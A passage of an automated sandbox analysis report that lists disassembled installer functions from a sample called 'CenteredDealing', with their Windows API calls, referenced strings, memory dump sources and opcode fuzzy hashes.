                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                                                                                Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                                                                                Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Sleep(9732)
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2152357448
                                                                                                                                                                                                                                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                                                                                Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4